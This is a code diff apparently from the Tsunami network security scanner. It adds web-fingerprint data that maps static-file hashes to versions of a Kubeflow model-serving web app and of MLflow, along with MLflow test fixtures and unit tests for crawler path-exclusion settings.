+0.9.0 +0.10.0 + 0.13.0-rc.0" +Ufrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"0 +frontend/src/app/types/event.ts + 0.13.0-rc.0"t +>frontend/src/app/pages/server-info/overview/overview.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Qfrontend/src/app/pages/server-info/details/transformer/transformer.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"| +Ffrontend/src/app/pages/server-info/details/shared/pod/pod.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"S +Bfrontend/src/app/pages/server-info/events/events.component.spec.ts + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/overview/component/component.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"3 +'static/main-es5.a5cd7efd5dde1bfea019.js +0.10.0"6 +*static/main-es2015.a5cd7efd5dde1bfea019.js +0.10.0" +Pfrontend/src/app/pages/server-info/details/explainer/explainer.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/logs/logs.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"y +Cfrontend/src/app/pages/server-info/overview/overview.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Q +frontend/tsconfig.spec.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/submit-form/submit-form.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"V + frontend/src/app/shared/utils.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"M +frontend/src/index.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/logs/logs.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/submit-form/submit-form.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"y +Cfrontend/src/app/pages/server-info/overview/overview.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"[ +%frontend/src/app/pages/index/utils.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"n +8frontend/src/app/pages/submit-form/submit-form.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/overview/component/component.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/submit-form/submit-form.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/runtime-es5.1e5bc577140eb82f67e7.js +0.7.0"; +*static/runtime-es5.473a4e3f2669c8a1cd2d.js + 0.13.0-rc.0"e +/frontend/src/app/pages/index/index.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +frontend/proxy.conf.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Y +#frontend/src/app/app.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Rfrontend/src/app/pages/server-info/details/shared/container/container.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"O +frontend/src/kubeflow.css +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"[ +Jfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.ts + 0.13.0-rc.0"N +config/base/service.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"2 +&static/styles.670c153d6051b6adabed.css +0.10.0" +Qfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/predictor/predictor.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"c +-frontend/src/environments/environment.prod.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +kfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Q +config/base/deployment.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"J +frontend/src/test.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/metrics/metrics.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Xfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"n +8frontend/src/app/pages/server-info/yamls/yamls.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"z +Dfrontend/src/app/pages/server-info/metrics/metrics.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Sfrontend/src/app/pages/server-info/metrics/grafana-graph/grafana-graph.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"P +frontend/package-lock.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"z +Dfrontend/src/app/pages/server-info/details/details.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"P +frontend/e2e/tsconfig.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"g +1frontend/src/app/pages/index/index.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"u +?frontend/src/app/pages/server-info/details/details.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Tfrontend/src/app/pages/server-info/details/shared/container/container.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +frontend/tsconfig.json +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/main-es2015.d8e7a931af75ca6eba2d.js +0.9.0"M +frontend/src/app/pages/server-info/logs/logs.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"~ +Hfrontend/src/app/pages/server-info/details/shared/pod/pod.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"\ +&frontend/src/app/app-routing.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"K +:frontend/src/app/pages/server-info/events/events.module.ts + 0.13.0-rc.0"h +2config/overlays/kubeflow/patches/web-app-vsvc.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Mfrontend/src/app/pages/server-info/details/predictor/predictor.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"> +Makefile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"Z +$config/overlays/kubeflow/params.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"G +frontend/i18n/messages.xlf +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +ffrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/types/backend.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"A + favicon.ico +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"N +frontend/src/favicon.ico +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/explainer/explainer.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/server-info/server-info.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"F +backend/Makefile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"j +4frontend/src/app/pages/index/index.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Kfrontend/src/app/pages/server-info/details/shared/pod/pod.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/details/details.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"| +Ffrontend/src/app/pages/server-info/overview/overview.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"O +hack/setup-dev-cluster.sh +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"K +frontend/browserslist +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Nfrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"q +;frontend/src/app/pages/server-info/yamls/yamls.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"L +frontend/karma.conf.js +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"r + +-static/runtime-es2015.473a4e3f2669c8a1cd2d.js + 0.13.0-rc.0"@ +/static/polyfills-es2015.d556b54b60accb59b2d4.js + 0.13.0-rc.0" +Qfrontend/src/app/pages/server-info/overview/component/component.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"\ +&frontend/src/app/app.component.spec.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"U +frontend/e2e/protractor.conf.js +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +hfrontend/src/app/pages/server-info/details/shared/component-extension/component-extension.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"] +Lfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.html + 0.13.0-rc.0"G +hack/variables.sh +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"5 +*static/main-es2015.06167965c3d1b2892706.js +0.7.0"a ++frontend/src/app/types/kfserving/v1beta1.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"7 +&static/styles.9bfe0c4db5394cb7d92b.css + 0.13.0-rc.0"@ + +Dockerfile +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"w +Afrontend/src/app/pages/server-info/details/details.component.scss +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"W +!frontend/src/app/app.component.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"s +=frontend/src/app/pages/server-info/server-info.component.html +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"T +frontend/src/app/app.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0" +Ifrontend/src/app/pages/server-info/logs/logs-viewer/logs-viewer.module.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"p +:config/overlays/kubeflow/web-app-authorization-policy.yaml +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"H +*static/runtime-es5.1243042158ada9164cc0.js +0.8.0 +0.9.0 +0.10.0"P +frontend/e2e/src/app.po.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"b +,frontend/src/app/services/grafana.service.ts +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"D +/static/polyfills-es2015.5483363f343843e60445.js +0.9.0 +0.10.0"8 +-static/runtime-es2015.1e5bc577140eb82f67e7.js +0.7.0"I +releasing/README.md +0.7.0 +0.8.0 +0.9.0 +0.10.0 + 0.13.0-rc.0"] +Lfrontend/src/app/shared/storage-uri-column/storage-uri-column.component.scss + 0.13.0-rc.0 \ No newline at end of file diff --git a/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto new file mode 100755 index 000000000..daf3aa259 --- /dev/null +++ b/google/fingerprinters/web/src/main/resources/fingerprinters/web/data/community/mlflow.binproto @@ -0,0 +1,458 @@ + + +mlflowO +)static-files/static/css/main.6d30cbb0.css" + 58777542d3051566d4f847b5813459f3M +'static-files/static/js/main.3fc83bde.js" + d9350c8f4c092ba85a88e64b1554bcefM +'static-files/static/js/main.3241cb2f.js" + 7a165f75977c752c6159a95f2431ae14O +)static-files/static/css/main.c3fe171a.css" + 917733df1cb4d8056f9639fbd70e9370M +'static-files/static/js/main.1208e44c.js" + 88497eadd2eceae6368ef2d64c4db8b3O +)static-files/static/css/main.2a740fb6.css" + 717a38689118b5ee7e18f901476324a8M +'static-files/static/js/main.97a9d480.js" + aa47834480f58f5931abb1ec9c9b2f1c> +static-files/favicon.ico" + 17d430cc5ae66deef9b500a6faec6576M +'static-files/static/js/main.869400b7.js" + 5da1558593204dbc763559c166dd5ad9O +)static-files/static/css/main.fc452620.css" + a5b6759ebe0c46d5ae0d7df3f5395ccaM +'static-files/static/js/main.3f69fad5.js" + 80f2136b701ede50c3cc4ef79d5a9ebfM +'static-files/static/js/main.8f2ec15f.js" + 58839a947656c61cbab9ace4d82194c4M +'static-files/static/js/main.79ae5ec7.js" + fb3948533c6777954ffa641f4cc9a1a6O +)static-files/static/css/main.a8b090b0.css" + c1d296c1949becd8e6c6c99b64a3a368O +)static-files/static/css/main.d432e97f.css" + 5954adf5fa62d1626033eef98135348bM +'static-files/static/js/main.b3b196bf.js" + 4d99e49f9a0f44901fd822f66e4e8554M +'static-files/static/js/main.f119600c.js" + acb78be117bcde9a14d8597c3306eed4M +'static-files/static/js/main.ab8e25f3.js" + 1b1561a0f79a06502378964222c3acfdM +'static-files/static/js/main.4dd3381c.js" + a60f5df7e50ca39f6e3d64cc3dffc202@ +static-files/manifest.json" + 62086d24223bfd1b6f9ee96e2fe508bcO +)static-files/static/css/main.45d71c4b.css" + 52756e150d8f1f516999dda441b95d73M +'static-files/static/js/main.a051daa5.js" + 9c73aa6db5534b284e3041cac53a5a27M +'static-files/static/js/main.a75bee39.js" + 4292313d91fcfc4809bec12f1be57a84M +'static-files/static/js/main.0377a7f9.js" + 4220a28d453f3ebe1354ed069b8f5191M +'static-files/static/js/main.a2d0394f.js" + e1ed5dc20a28212951864560be8161a3M +'static-files/static/js/main.ce94c8c2.js" + 5176b4132bd269a01e137cd35621b18dO +)static-files/static/css/main.3b6f4584.css" + 18da093190fe15b15f7c4c638b1ad084M +'static-files/static/js/main.df57f185.js" + f9e8335314e3a6f4689c984baa1e4ea7M +'static-files/static/js/main.71510886.js" + 14a9a4f714e371c31a1d5272da007424M +'static-files/static/js/main.2d12c0ae.js" + fc382f4d60068406d3b0e63f3af3198eM +'static-files/static/js/main.b49c1c9a.js" + 78ed6bb4369e4b6063413f8cdca2026cO +)static-files/static/css/main.ef33a5e7.css" + da6884c4a83b3f741f3688bed5adb9e2M +'static-files/static/js/main.6125589f.js" + dec6166513b88d5e0b04433dd87ad0ffM +'static-files/static/js/main.803f1727.js" + 4eb173bbfe94cea6a7d37a803a495dc3M +'static-files/static/js/main.80fd8eef.js" + 2a3e4bf7e02f09d13184ad55ef8416bfM +'static-files/static/js/main.9f3548a7.js" + 4d1bf2010713ecc85c07edd45141139dM +'static-files/static/js/main.20598683.js" + 074886975848b4aa61f2b7cec8cf3f25O +)static-files/static/css/main.9b3f40e9.css" + da9e124bc5bf74b1de6fd94fdc697936O +)static-files/static/css/main.9eafd206.css" + 861b9be3c9e22e11e0e01999bc343a2aM +'static-files/static/js/main.77ba8472.js" + 3b44fb327883ff6b4d7544a1746aa10aM +'static-files/static/js/main.0de244d3.js" + ce917b9ad6dcf2065fb5953b22039468M +'static-files/static/js/main.2dfd8740.js" + ea86bca5f2bf9417c8006aa7590079c0M +'static-files/static/js/main.a14f1bf8.js" + e37dff68be4d5f3d782f9faee72f43f88 +" + 18da093190fe15b15f7c4c638b1ad084 +v2.0.0 +v2.0.1. +" + f9e8335314e3a6f4689c984baa1e4ea7 +v2.0.0/ +" + e1ed5dc20a28212951864560be8161a3 +v2.11.2. +" + a60f5df7e50ca39f6e3d64cc3dffc202 +v2.9.2. +" + 2a3e4bf7e02f09d13184ad55ef8416bf +v2.3.1. +" + 9c73aa6db5534b284e3041cac53a5a27 +v2.1.08 +" + 861b9be3c9e22e11e0e01999bc343a2a +v2.7.0 +v2.7.1/ +" + 7a165f75977c752c6159a95f2431ae14 +v2.10.2/ +" + 074886975848b4aa61f2b7cec8cf3f25 +v2.11.1. +" + 5176b4132bd269a01e137cd35621b18d +v2.6.0V +" + 717a38689118b5ee7e18f901476324a8 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0. +" + d9350c8f4c092ba85a88e64b1554bcef +v2.2.2. +" + 4d1bf2010713ecc85c07edd45141139d +v2.9.1. +" + 78ed6bb4369e4b6063413f8cdca2026c +v2.4.1. +" + fb3948533c6777954ffa641f4cc9a1a6 +v2.9.0L +" + 58777542d3051566d4f847b5813459f3 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2. +" + 80f2136b701ede50c3cc4ef79d5a9ebf +v2.2.1/ +" + 3b44fb327883ff6b4d7544a1746aa10a +v2.10.1/ +" + da6884c4a83b3f741f3688bed5adb9e2 +v1.30.0. +" + 4292313d91fcfc4809bec12f1be57a84 +v2.3.0/ +" + ea86bca5f2bf9417c8006aa7590079c0 +v2.10.08 +" + 5954adf5fa62d1626033eef98135348b +v2.1.0 +v2.1.1. +" + aa47834480f58f5931abb1ec9c9b2f1c +v2.7.0. +" + e37dff68be4d5f3d782f9faee72f43f8 +v2.3.2/ +" + ce917b9ad6dcf2065fb5953b22039468 +v1.30.01 +" + da9e124bc5bf74b1de6fd94fdc697936 + v2.0.0rc0. +" + 14a9a4f714e371c31a1d5272da007424 +v2.2.0B +" + a5b6759ebe0c46d5ae0d7df3f5395cca +v2.2.0 +v2.2.1 +v2.2.2B +" + 52756e150d8f1f516999dda441b95d73 +v2.3.0 +v2.3.1 +v2.3.2. +" + 4eb173bbfe94cea6a7d37a803a495dc3 +v2.8.1. +" + fc382f4d60068406d3b0e63f3af3198e +v2.4.2. +" + 58839a947656c61cbab9ace4d82194c4 +v2.4.0. +" + acb78be117bcde9a14d8597c3306eed4 +v2.7.1P +" + c1d296c1949becd8e6c6c99b64a3a368 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3. +" + 4d99e49f9a0f44901fd822f66e4e8554 +v2.1.1. +" + 4220a28d453f3ebe1354ed069b8f5191 +v2.5.0 +" + 62086d24223bfd1b6f9ee96e2fe508bc +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3E +" + 917733df1cb4d8056f9639fbd70e9370 +v2.10.0 +v2.10.1 +v2.10.2/ +" + 88497eadd2eceae6368ef2d64c4db8b3 +v2.11.0. +" + dec6166513b88d5e0b04433dd87ad0ff +v2.0.11 +" + 1b1561a0f79a06502378964222c3acfd + v2.0.0rc0/ +" + 5da1558593204dbc763559c166dd5ad9 +v2.11.3 +" + 17d430cc5ae66deef9b500a6faec6576 +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"S +)static-files/static/css/main.6d30cbb0.css +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2"3 +'static-files/static/js/main.3fc83bde.js +v2.2.2"4 +'static-files/static/js/main.3241cb2f.js +v2.10.2"L +)static-files/static/css/main.c3fe171a.css +v2.10.0 +v2.10.1 +v2.10.2"4 +'static-files/static/js/main.1208e44c.js +v2.11.0"] +)static-files/static/css/main.2a740fb6.css +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0"3 +'static-files/static/js/main.97a9d480.js +v2.7.0" +static-files/favicon.ico +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"4 +'static-files/static/js/main.869400b7.js +v2.11.3"I +)static-files/static/css/main.fc452620.css +v2.2.0 +v2.2.1 +v2.2.2"3 +'static-files/static/js/main.3f69fad5.js +v2.2.1"3 +'static-files/static/js/main.8f2ec15f.js +v2.4.0"3 +'static-files/static/js/main.79ae5ec7.js +v2.9.0"W +)static-files/static/css/main.a8b090b0.css +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"? +)static-files/static/css/main.d432e97f.css +v2.1.0 +v2.1.1"3 +'static-files/static/js/main.b3b196bf.js +v2.1.1"3 +'static-files/static/js/main.f119600c.js +v2.7.1"6 +'static-files/static/js/main.ab8e25f3.js + v2.0.0rc0"3 +'static-files/static/js/main.4dd3381c.js +v2.9.2" +static-files/manifest.json +v1.30.0 + v2.0.0rc0 +v2.0.0 +v2.0.1 +v2.1.0 +v2.1.1 +v2.2.0 +v2.2.1 +v2.2.2 +v2.3.0 +v2.3.1 +v2.3.2 +v2.4.0 +v2.4.1 +v2.4.2 +v2.5.0 +v2.6.0 +v2.7.0 +v2.7.1 +v2.8.1 +v2.9.0 +v2.9.1 +v2.9.2 +v2.10.0 +v2.10.1 +v2.10.2 +v2.11.0 +v2.11.1 +v2.11.2 +v2.11.3"I +)static-files/static/css/main.45d71c4b.css +v2.3.0 +v2.3.1 +v2.3.2"3 +'static-files/static/js/main.a051daa5.js +v2.1.0"3 +'static-files/static/js/main.a75bee39.js +v2.3.0"3 +'static-files/static/js/main.0377a7f9.js +v2.5.0"4 +'static-files/static/js/main.a2d0394f.js +v2.11.2"3 +'static-files/static/js/main.ce94c8c2.js +v2.6.0"? +)static-files/static/css/main.3b6f4584.css +v2.0.0 +v2.0.1"3 +'static-files/static/js/main.df57f185.js +v2.0.0"3 +'static-files/static/js/main.71510886.js +v2.2.0"3 +'static-files/static/js/main.2d12c0ae.js +v2.4.2"3 +'static-files/static/js/main.b49c1c9a.js +v2.4.1"6 +)static-files/static/css/main.ef33a5e7.css +v1.30.0"3 +'static-files/static/js/main.6125589f.js +v2.0.1"3 +'static-files/static/js/main.803f1727.js +v2.8.1"3 +'static-files/static/js/main.80fd8eef.js +v2.3.1"3 +'static-files/static/js/main.9f3548a7.js +v2.9.1"4 +'static-files/static/js/main.20598683.js +v2.11.1"8 +)static-files/static/css/main.9b3f40e9.css + v2.0.0rc0"? +)static-files/static/css/main.9eafd206.css +v2.7.0 +v2.7.1"4 +'static-files/static/js/main.77ba8472.js +v2.10.1"4 +'static-files/static/js/main.0de244d3.js +v1.30.0"4 +'static-files/static/js/main.2dfd8740.js +v2.10.0"3 +'static-files/static/js/main.a14f1bf8.js +v2.3.2 \ No newline at end of file diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java index 5fbbbd7d7..c875d4ea1 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/CommonTestData.java @@ -145,6 +145,15 @@ private CommonTestData() {} .build(); public static final Hash SOFTWARE_3_CSS_HASH = Hash.newBuilder().setHexString("1ebae34d06fc5a9be81b852a7c354041").build(); + + public static final CrawlResult SOFTWARE_4_MLFLOW = + CrawlResult.newBuilder() + .setCrawlTarget( + CrawlTarget.newBuilder().setUrl(fakeUrl("/login?from")).setHttpMethod("GET")) + .setResponseCode(200) + .setContent(ByteString.copyFromUtf8("MLFLOW")) + .build(); + public static final CrawlResult UNKNOWN_CONTENT = CrawlResult.newBuilder() .setCrawlTarget(CrawlTarget.newBuilder().setUrl(fakeUrl("/unknown")).setHttpMethod("GET")) @@ -157,6 +166,9 @@ private CommonTestData() {} SoftwareIdentity.newBuilder().setSoftware("Software2").build(); public static final SoftwareIdentity SOFTWARE_IDENTITY_3 = SoftwareIdentity.newBuilder().setSoftware("Software3").build(); + + public static final SoftwareIdentity SOFTWARE_IDENTITY_4 = + SoftwareIdentity.newBuilder().setSoftware("mlflow").build(); public static final FingerprintData FINGERPRINT_DATA_1 = FingerprintData.fromProto( Fingerprints.newBuilder() diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java index 097faafdc..a128ee23f 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterConfigsTest.java @@ -149,4 +149,36 @@ public void contentTypeExclusions_whenBothCliAndConfigAreNotSet_returnsDefaultVa .containsExactly("application/zip", "application/gzip") .inOrder(); } + + @Test + public void pathExclusions_whenCliOptionSet_returnsCliOptionSetting() { + cliOptions.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$"); + assertThat(configs.getPathExclusions()) + .containsExactly(".*/logout$", ".*/dangerous$") + .inOrder(); + } + + @Test + public void pathExclusions_whenConfigPropertySet_returnsConfigPropertySetting() { + configProperties.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$"); + assertThat(configs.getPathExclusions()) + .containsExactly(".*/logout$", ".*/dangerous$") + .inOrder(); + } + + @Test + public void pathExclusions_whenBothCliAndConfigAreSet_cliOptionTakesPrecedence() { + cliOptions.pathExclusions = ImmutableList.of(".*/logout$", ".*/dangerous$"); + configProperties.pathExclusions = ImmutableList.of(".*/login$", ".*/safe$"); + assertThat(configs.getPathExclusions()) + .containsExactly(".*/logout$", ".*/dangerous$") + .inOrder(); + } + + @Test + public void pathExclusions_whenBothCliAndConfigAreNotSet_returnsDefaultValue() { + cliOptions.pathExclusions = null; + configProperties.pathExclusions = null; + assertThat(configs.getPathExclusions()).isEmpty(); + } } diff --git a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java index 8681041df..86b669f26 100644 --- a/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java +++ b/google/fingerprinters/web/src/test/java/com/google/tsunami/plugins/fingerprinters/web/WebServiceFingerprinterTest.java @@ -19,6 +19,7 @@ import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; import static com.google.common.util.concurrent.Futures.immediateFuture; import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostname; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forHostnameAndPort; import static com.google.tsunami.common.data.NetworkEndpointUtils.forIp; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.COMMON_LIB; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.FINGERPRINT_DATA_1; @@ -29,9 +30,11 @@ import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_2_ICON; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_3_CSS; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_3_ZIP; +import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_4_MLFLOW; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_1; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_2; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_3; +import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.SOFTWARE_IDENTITY_4; import static com.google.tsunami.plugins.fingerprinters.web.CommonTestData.fakeUrl; import com.google.common.collect.ImmutableList; @@ -42,6 +45,7 @@ import 